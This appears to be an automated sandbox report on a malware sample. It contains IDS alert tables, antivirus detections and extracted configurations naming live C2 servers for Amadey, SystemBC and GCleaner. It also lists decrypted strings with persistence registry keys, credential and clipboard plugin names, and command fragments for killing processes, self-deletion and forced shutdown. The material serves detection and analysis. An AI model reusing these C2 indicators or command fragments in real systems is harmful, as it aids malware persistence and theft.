2025-03-06T08:11:15.342665+0100 | 2060414 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 52324 | 1.1.1.1 | 53 | UDP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-06T08:11:15.473826+0100 | 2060416 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 61809 | 1.1.1.1 | 53 | UDP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-06T08:11:15.439579+0100 | 2060418 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 62407 | 1.1.1.1 | 53 | UDP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-06T08:11:15.487878+0100 | 2060420 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 61070 | 1.1.1.1 | 53 | UDP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-06T08:11:15.460757+0100 | 2060422 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 61777 | 1.1.1.1 | 53 | UDP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-06T08:11:15.380081+0100 | 2060424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.11 | 59174 | 1.1.1.1 | 53 | UDP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-06T08:10:24.841170+0100 | 2044245 | 1 | Malware Command and Control Activity Detected | 38.180.229.217 | 80 | 192.168.2.11 | 49762 | TCP
2025-03-06T08:11:08.316833+0100 | 2044245 | 1 | Malware Command and Control Activity Detected | 38.180.229.217 | 80 | 192.168.2.11 | 64638 | TCP
2025-03-06T08:11:49.121923+0100 | 2044245 | 1 | Malware Command and Control Activity Detected | 45.93.20.28 | 80 | 192.168.2.11 | 50918 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-06T08:10:24.781546+0100 | 2044244 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49762 | 38.180.229.217 | 80 | TCP
2025-03-06T08:11:08.294584+0100 | 2044244 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64638 | 38.180.229.217 | 80 | TCP
2025-03-06T08:11:48.980732+0100 | 2044244 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 50918 | 45.93.20.28 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-06T08:10:25.052844+0100 | 2044246 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49762 | 38.180.229.217 | 80 | TCP
2025-03-06T08:11:08.521453+0100 | 2044246 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64638 | 38.180.229.217 | 80 | TCP
2025-03-06T08:11:49.354046+0100 | 2044246 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 50918 | 45.93.20.28 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-06T08:11:01.151633+0100 | 2044249 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49762 | 38.180.229.217 | 80 | TCP
2025-03-06T08:11:43.417061+0100 | 2044249 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 50822 | 38.180.229.217 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-06T08:10:25.886236+0100 | 2044248 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49762 | 38.180.229.217 | 80 | TCP
2025-03-06T08:11:09.083260+0100 | 2044248 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64638 | 38.180.229.217 | 80 | TCP
2025-03-06T08:11:51.167019+0100 | 2044248 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 50918 | 45.93.20.28 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-06T08:10:25.276585+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 38.180.229.217 | 80 | 192.168.2.11 | 49762 | TCP
2025-03-06T08:11:08.539104+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 38.180.229.217 | 80 | 192.168.2.11 | 64638 | TCP
2025-03-06T08:11:49.385659+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 45.93.20.28 | 80 | 192.168.2.11 | 50918 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-06T08:11:06.877348+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64586 | 104.21.80.1 | 443 | TCP
2025-03-06T08:11:36.746461+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 50654 | 104.21.24.225 | 443 | TCP
2025-03-06T08:12:00.044452+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 51082 | 104.21.48.1 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-06T08:10:24.567613+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49762 | 38.180.229.217 | 80 | TCP
2025-03-06T08:11:08.038389+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64638 | 38.180.229.217 | 80 | TCP
2025-03-06T08:11:48.723929+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 50918 | 45.93.20.28 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-06T08:10:07.081676+0100 | 2856147 | 1 | A Network Trojan was detected | 192.168.2.11 | 49752 | 176.113.115.6 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-06T08:10:20.526495+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 49759 | 107.189.27.66 | 80 | TCP
2025-03-06T08:10:31.966158+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 49777 | 107.189.27.66 | 80 | TCP
2025-03-06T08:10:36.433776+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 49791 | 107.189.27.66 | 80 | TCP
2025-03-06T08:10:41.077034+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 49796 | 107.189.27.66 | 80 | TCP
2025-03-06T08:10:45.475636+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 49802 | 107.189.27.66 | 80 | TCP
2025-03-06T08:10:49.850438+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 59843 | 107.189.27.66 | 80 | TCP
2025-03-06T08:10:54.997278+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 59898 | 107.189.27.66 | 80 | TCP
2025-03-06T08:10:59.715567+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 59985 | 107.189.27.66 | 80 | TCP
2025-03-06T08:11:05.223654+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 64596 | 107.189.27.66 | 80 | TCP
2025-03-06T08:11:10.093570+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 64700 | 107.189.27.66 | 80 | TCP
2025-03-06T08:11:15.292947+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 64808 | 107.189.27.66 | 80 | TCP
2025-03-06T08:11:20.280059+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 53717 | 107.189.27.66 | 80 | TCP
2025-03-06T08:11:24.896420+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 53925 | 107.189.27.66 | 80 | TCP
2025-03-06T08:11:29.326690+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 50556 | 107.189.27.66 | 80 | TCP
2025-03-06T08:11:33.746496+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 50641 | 107.189.27.66 | 80 | TCP
2025-03-06T08:11:38.160634+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 50706 | 107.189.27.66 | 80 | TCP
2025-03-06T08:11:43.541179+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 50812 | 107.189.27.66 | 80 | TCP
2025-03-06T08:11:48.131201+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 50911 | 107.189.27.66 | 80 | TCP
2025-03-06T08:11:52.608288+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 51005 | 107.189.27.66 | 80 | TCP
2025-03-06T08:11:57.029519+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.11 | 51066 | 107.189.27.66 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-06T08:10:11.849663+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 49755 | 176.113.115.7 | 80 | TCP
2025-03-06T08:10:17.676605+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 49757 | 176.113.115.7 | 80 | TCP
2025-03-06T08:10:22.998574+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 49761 | 45.59.120.8 | 80 | TCP
2025-03-06T08:10:24.897256+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 49763 | 176.113.115.7 | 80 | TCP
2025-03-06T08:10:32.054230+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 49776 | 176.113.115.7 | 80 | TCP
2025-03-06T08:10:38.580972+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 49793 | 176.113.115.7 | 80 | TCP
2025-03-06T08:10:44.173243+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 49801 | 176.113.115.7 | 80 | TCP
2025-03-06T08:10:54.125864+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 59889 | 176.113.115.7 | 80 | TCP
2025-03-06T08:11:01.289703+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 64553 | 176.113.115.7 | 80 | TCP
2025-03-06T08:11:11.530513+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 64734 | 176.113.115.7 | 80 | TCP
2025-03-06T08:11:20.455950+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 53723 | 176.113.115.7 | 80 | TCP
2025-03-06T08:11:31.570917+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 50589 | 176.113.115.7 | 80 | TCP
2025-03-06T08:11:38.412334+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 50709 | 176.113.115.7 | 80 | TCP
2025-03-06T08:11:45.383657+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 50845 | 176.113.115.7 | 80 | TCP
2025-03-06T08:11:52.670839+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 51004 | 176.113.115.7 | 80 | TCP
2025-03-06T08:11:57.182647+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.11 | 51067 | 176.113.115.7 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-06T08:10:26.376164+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.11 | 49762 | 38.180.229.217 | 80 | TCP
2025-03-06T08:10:51.926775+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.11 | 49762 | 38.180.229.217 | 80 | TCP
2025-03-06T08:10:53.619352+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.11 | 49762 | 38.180.229.217 | 80 | TCP
2025-03-06T08:10:54.450296+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.11 | 49762 | 38.180.229.217 | 80 | TCP
2025-03-06T08:10:55.202313+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.11 | 49762 | 38.180.229.217 | 80 | TCP
2025-03-06T08:10:57.213629+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.11 | 49762 | 38.180.229.217 | 80 | TCP
2025-03-06T08:10:57.744358+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.11 | 49762 | 38.180.229.217 | 80 | TCP
2025-03-06T08:11:09.760378+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.11 | 64638 | 38.180.229.217 | 80 | TCP
2025-03-06T08:11:31.362311+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.11 | 50576 | 38.180.229.217 | 80 | TCP
                                                2025-03-06T08:11:32.375360+010028033043Unknown Traffic192.168.2.115057638.180.229.21780TCP
                                                2025-03-06T08:11:33.566273+010028033043Unknown Traffic192.168.2.115063738.180.229.21780TCP
                                                2025-03-06T08:11:34.943927+010028033043Unknown Traffic192.168.2.115065638.180.229.21780TCP
                                                2025-03-06T08:11:37.496570+010028033043Unknown Traffic192.168.2.115069438.180.229.21780TCP
                                                2025-03-06T08:11:38.614418+010028033043Unknown Traffic192.168.2.115071538.180.229.21780TCP
                                                2025-03-06T08:11:51.400793+010028033043Unknown Traffic192.168.2.115091845.93.20.2880TCP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:11:58.974565+010028032742Potentially Bad Traffic192.168.2.1151103185.176.43.9880TCP
                                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                                2025-03-06T08:11:22.510401+010028438641A Network Trojan was detected192.168.2.1153747104.21.80.1443TCP
                                                2025-03-06T08:11:39.121321+010028438641A Network Trojan was detected192.168.2.1150703104.21.24.225443TCP
                                                2025-03-06T08:11:44.330345+010028438641A Network Trojan was detected192.168.2.1150804104.21.48.1443TCP
                                                2025-03-06T08:12:02.382432+010028438641A Network Trojan was detected192.168.2.1151118104.21.48.1443TCP

                                                AV Detection

Source: aV2ffcSuKl.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\vertualiziren[1].exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\ProgramData\jnxnee\benskvi.exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[1].exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\ILqcVeT[1].exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\rXOl0pp[1].exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[1].exe | Avira: detection malicious, Label: TR/Kryptik.zivzb
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[1].exe | Avira: detection malicious, Label: HEUR/AGEN.1314794
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | Malware Configuration Extractor: Amadey {"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
Source: 0000001D.00000003.2078657215.0000000004774000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: SystemBC {"HOST1": "towerbingobongoboom.com", "HOST2": "62.60.226.86"}
Source: 62.2.7dbaa342f5.exe.dd00000.6.raw.unpack | Malware Configuration Extractor: GCleaner {"C2 addresses": ["185.156.73.73", "45.91.200.135"]}
Source: C:\ProgramData\jnxnee\benskvi.exe | ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\vertualiziren[1].exe | ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[1].exe | ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\nhDLtPT[1].exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\10111190101\acd63ce6fe.exe | ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | ReversingLabs: Detection: 60%
Source: aV2ffcSuKl.exe | Virustotal: Detection: 68%
Source: aV2ffcSuKl.exe | ReversingLabs: Detection: 63%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: 176.113.115.6
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: /Ni9kiput/index.php
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: S-%lu-
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: bb556cff4a
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: rapes.exe
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: Startup
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: cmd /C RMDIR /s/q
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: rundll32
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: Programs
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: %USERPROFILE%
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: cred.dll|clip.dll|
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: cred.dll
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: clip.dll
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: http://
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: https://
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: /quiet
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: /Plugins/
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: &unit=
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: shell32.dll
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: kernel32.dll
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: GetNativeSystemInfo
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: ProgramData\
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: AVAST Software
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: Kaspersky Lab
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: Panda Security
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: Doctor Web
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: 360TotalSecurity
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: Bitdefender
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: Norton
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: Sophos
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: Comodo
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: WinDefender
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: 0123456789
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: ------
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: ?scr=1
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: ComputerName
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: -unicode-
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: VideoID
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: DefaultSettings.XResolution
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: DefaultSettings.YResolution
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: ProductName
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: CurrentBuild
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: rundll32.exe
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: "taskkill /f /im "
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: " && timeout 1 && del
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: && Exit"
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: " && ren
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: Powershell.exe
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: -executionpolicy remotesigned -File "
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: shutdown -s -t 0
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: random
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: Keyboard Layout\Preload
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: 00000419
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: 00000422
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: 00000423
Source: 0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmp | String decryptor: 0000043f

                                                Phishing

Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta, type: DROPPED
Source: Yara match | File source: C:\Temp\plDCQRtK9.hta, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\1lEt3ife9.hta, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, type: DROPPED
Source: aV2ffcSuKl.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:59943 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:64532 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:64586 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:64662 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:64756 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:64821 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.11:64823 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.24.225:443 -> 192.168.2.11:53736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:53747 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.24.225:443 -> 192.168.2.11:53889 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.11:53928 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.24.225:443 -> 192.168.2.11:53950 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:53957 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.11:50532 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.24.225:443 -> 192.168.2.11:50549 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.11:50574 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.24.225:443 -> 192.168.2.11:50611 version: TLS 1.2
                                                Source: Binary string: mozglue.pdbP source: ILqcVeT.exe, 00000017.00000002.2551363792.000000006B99D000.00000002.00000001.01000000.0000001D.sdmp
                                                Source: Binary string: nss3.pdb@ source: ILqcVeT.exe, 00000017.00000002.2552179912.000000006BB5F000.00000002.00000001.01000000.0000001C.sdmp
                                                Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.1466076584.000001DDD56E5000.00000004.00000020.00020000.00000000.sdmp
                                                Source: Binary string: BitLockerToGo.pdb source: 7dbaa342f5.exe, 0000003E.00000002.2594796685.000000000DB74000.00000004.00001000.00020000.00000000.sdmp
                                                Source: Binary string: *e.pdb source: powershell.exe, 00000009.00000002.1468143447.000001DDD58B0000.00000004.00000020.00020000.00000000.sdmp
                                                Source: Binary string: tomation.pdb1 source: powershell.exe, 00000009.00000002.1466076584.000001DDD56E5000.00000004.00000020.00020000.00000000.sdmp
                                                Source: Binary string: nss3.pdb source: ILqcVeT.exe, 00000017.00000002.2552179912.000000006BB5F000.00000002.00000001.01000000.0000001C.sdmp
                                                Source: Binary string: mozglue.pdb source: ILqcVeT.exe, 00000017.00000002.2551363792.000000006B99D000.00000002.00000001.01000000.0000001D.sdmp
                                                Source: Binary string: BitLockerToGo.pdbGCTL source: 7dbaa342f5.exe, 0000003E.00000002.2594796685.000000000DB74000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C7DBBE
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C4C2A2 FindFirstFileExW,0_2_00C4C2A2
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C868EE FindFirstFileW,FindClose,0_2_00C868EE
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00C8698F
